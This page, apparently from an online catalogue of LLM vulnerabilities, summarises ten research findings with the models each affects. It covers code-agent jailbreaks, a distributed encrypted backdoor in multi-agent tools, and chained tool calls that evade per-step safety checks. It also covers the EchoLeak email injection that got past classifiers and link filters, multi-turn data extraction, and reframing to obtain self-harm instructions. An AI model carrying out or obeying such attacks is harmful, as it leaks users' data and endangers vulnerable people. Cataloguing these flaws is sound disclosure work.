Data Security Vulnerabilities

Issues affecting data confidentiality and integrity

Related Vulnerabilities

81 entries

Code Agent Executable Jailbreaks

10/13/2025

AI code agents are vulnerable to jailbreaking attacks that cause them to generate or complete malicious code. The vulnerability is significantly amplified when a base Large Language Model (LLM) is integrated into an agentic framework that uses multi-step planning and tool-use. Initial safety refusals by the LLM are frequently overturned during subsequent planning or self-correction steps within the agent's reasoning loop.

Breaking the Code: Security Assessment of AI Code Agents Through Systematic Jailbreaking Attacks

Affects: gpt-4.1, gpt-o1, deepseek-r1, qwen3-235b, mistral large 2.1, llama-3.1-70b, llama-3-8b, claude-3.7-sonnet, dolphinmistral-24b-venice

Distributed Backdoor in Multi-Agent Systems

10/31/2025

A distributed backdoor vulnerability, named "Collaborative Shadows", exists in LLM-based Multi-Agent Systems (MAS) that rely on external or modifiable tools. An attacker can poison multiple agent tools by embedding inert, encrypted "attack primitives" within them. These primitives are fragments of a larger malicious payload. A carefully crafted user instruction acts as both a trigger and a decryption key. The instruction steers the agents to collaborate in a specific sequence, causing them to invoke the poisoned tools in a predefined order. The encrypted primitives are released into the agents' observations and memory. After task completion, the attacker can scan the execution trace or agent memories for the primitives, decrypt them using the initial instruction, and reassemble them to execute the full malicious payload, such as exfiltrating sensitive data processed by the agents. The attack exploits the inter-agent collaboration process itself, and since the backdoor is decentralized and its components are individually benign, it can evade detection by tools that only inspect individual agents or tools in isolation. See arXiv:2405.18540.

Collaborative Shadows: Distributed Backdoor Attacks in LLM-Based Multi-Agent Systems

Affects: qwen3-30b-a3b, glm-4.5-air, kimi-k2-instruct, gemini-2.5-pro, gpt-4.1

Chained Tool-Use Injections

10/13/2025

A vulnerability exists in tool-enabled Large Language Model (LLM) agents, termed Sequential Tool Attack Chaining (STAC), where a sequence of individually benign tool calls can be orchestrated to achieve a malicious outcome. An attacker can guide an agent through a multi-turn interaction, with each step appearing harmless in isolation. Safety mechanisms that evaluate individual prompts or actions fail to detect the threat because the malicious intent is distributed across the sequence and only becomes apparent from the cumulative effect of the entire tool chain, typically at the final execution step. This allows the bypass of safety guardrails to execute harmful actions in the agent's environment.

STAC: When Innocent Tools Form Dangerous Chains to Jailbreak LLM Agents

Affects: gpt-4.1-2025-04-14, gpt-4.1-mini-2025-04-14, qwen3-32b, llama-3.1-405b-instruct, llama3.3-70b-instruct, mistral-large-instruct-2411, mistral-small-3.2-24b-instruct-2506, magistral-small-2506, gpt-4.1

Content Concretization Jailbreak

9/30/2025

A vulnerability, termed "Content Concretization," exists in Large Language Models (LLMs) wherein safety filters can be bypassed by iteratively refining a malicious request. The attack uses a less-constrained, lower-tier LLM to generate a preliminary draft (e.g., pseudocode or a non-executable prototype) of a malicious tool from an abstract prompt. This "concretized" draft is then passed to a more capable, higher-tier LLM. The higher-tier LLM, when prompted to refine or complete the existing draft, is significantly more likely to generate the full malicious, executable content than if it had received the initial abstract prompt directly. This exploits a weakness in safety alignment where models are more permissive in extending existing content compared to generating harmful content from scratch.

Jailbreaking Large Language Models Through Content Concretization

Affects: gpt-4o-mini, claude 3.7 sonnet, claude 3.5 sonnet, claude 3.5 haiku, gemini 2.5 flash preview, gemini 2.5 pro preview, gemini 2.0 flash, gpt-4.1o3, gpt-4o, gpt-o3, gpt-4

EchoLeak Zero-Click Data Exfiltration

9/30/2025

A zero-click indirect prompt injection vulnerability, CVE-2025-32711, existed in Microsoft 365 Copilot. A remote, unauthenticated attacker could exfiltrate sensitive data from a victim's session by sending a crafted email. When Copilot later processed this email as part of a user's query, hidden instructions caused it to retrieve sensitive data from the user's context (e.g., other emails, documents) and embed it into a URL. The attack chain involved bypassing Microsoft's XPIA prompt injection classifier, evading link redaction filters using reference-style Markdown, and abusing a trusted Microsoft Teams proxy domain to bypass the client-side Content Security Policy (CSP), resulting in automatic data exfiltration without any user interaction.

EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System

LLM Agent TOCTOU Vulnerabilities

8/31/2025

A Time-of-Check to Time-of-Use (TOCTOU) vulnerability exists in LLM-enabled agentic systems that execute multi-step plans involving sequential tool calls. The vulnerability arises because plans are not executed atomically. An agent may perform a "check" operation (e.g., reading a file, checking a permission) in one tool call, and a subsequent "use" operation (e.g., writing to the file, performing a privileged action) in another tool call. A temporal gap between these calls, often used for LLM reasoning, allows an external process or attacker to modify the underlying resource state. This leads the agent to perform its "use" action on stale or manipulated data, resulting in unintended behavior, information disclosure, or security bypass.

Mind the Gap: Time-of-Check to Time-of-Use Vulnerabilities in LLM-Enabled Agents

Enterprise Multi-Turn Data Exfiltration

7/28/2025

Large Language Model (LLM) systems integrated with private enterprise data, such as those using Retrieval-Augmented Generation (RAG), are vulnerable to multi-stage prompt inference attacks. An attacker can use a sequence of individually benign-looking queries to incrementally extract confidential information from the LLM's context. Each query appears innocuous in isolation, bypassing safety filters designed to block single malicious prompts. By chaining these queries, the attacker can reconstruct sensitive data from internal documents, emails, or other private sources accessible to the LLM. The attack exploits the conversational context and the model's inability to recognize the cumulative intent of a prolonged, strategic dialogue.

Multi-Stage Prompt Inference Attacks on Enterprise LLM Systems

Affects: gpt-4, gpt-3, gpt-2, roberta, gemini

LLM Suicide Prompt Jailbreak

7/14/2025

Large Language Models (LLMs) employing safety filters designed to prevent generation of content related to self-harm and suicide can be bypassed through multi-step adversarial prompting. By reframing the request as an academic exercise or hypothetical scenario, users can elicit detailed instructions and information that could facilitate self-harm or suicide, despite initially expressing harmful intent. This vulnerability lies in the inadequacy of existing safety filters to consistently recognize and prevent harmful outputs despite shifts in conversational context.

For Argument's Sake, Show Me How to Harm Myself!': Jailbreaking LLMs in Suicide and Self-Harm Contexts

Affects: chat-gpt4o*, chat-gpt4o, perplexityai, gemini flash 2.0, claude 3.7 sonnet, pi ai

Stealthy Unlearning Degradation

6/30/2025

A vulnerability in fine-tuning-based large language model (LLM) unlearning allows malicious actors to craft manipulated forgetting requests. By subtly increasing the frequency of common benign tokens within the forgetting data, the attacker can cause the unlearned model to exhibit unintended unlearning behaviors when these benign tokens appear in normal user prompts, leading to a degradation of model utility for legitimate users. This occurs because existing unlearning methods fail to effectively distinguish between benign tokens and those truly related to the target knowledge being unlearned.

Keeping an eye on llm unlearning: The hidden risk and remedy

Affects: llama 3.1 (8b), mistral v0.3 (7b)

Agent Red-Teaming via Fuzzing

7/14/2025

Large Language Model (LLM) agents are vulnerable to indirect prompt injection attacks through manipulation of external data sources accessed during task execution. Attackers can embed malicious instructions within this external data, causing the LLM agent to perform unintended actions, such as navigating to arbitrary URLs or revealing sensitive information. The vulnerability stems from insufficient sanitization and validation of external data before it's processed by the LLM.

AgentVigil: Generic Black-Box Red-teaming for Indirect Prompt Injection against LLM Agents

Affects: o3-mini, gpt-4o, gpt-4o-mini, claude-3.5-sonnet, gemini-2-flash-exp, llama3-8b

Page 1 of 9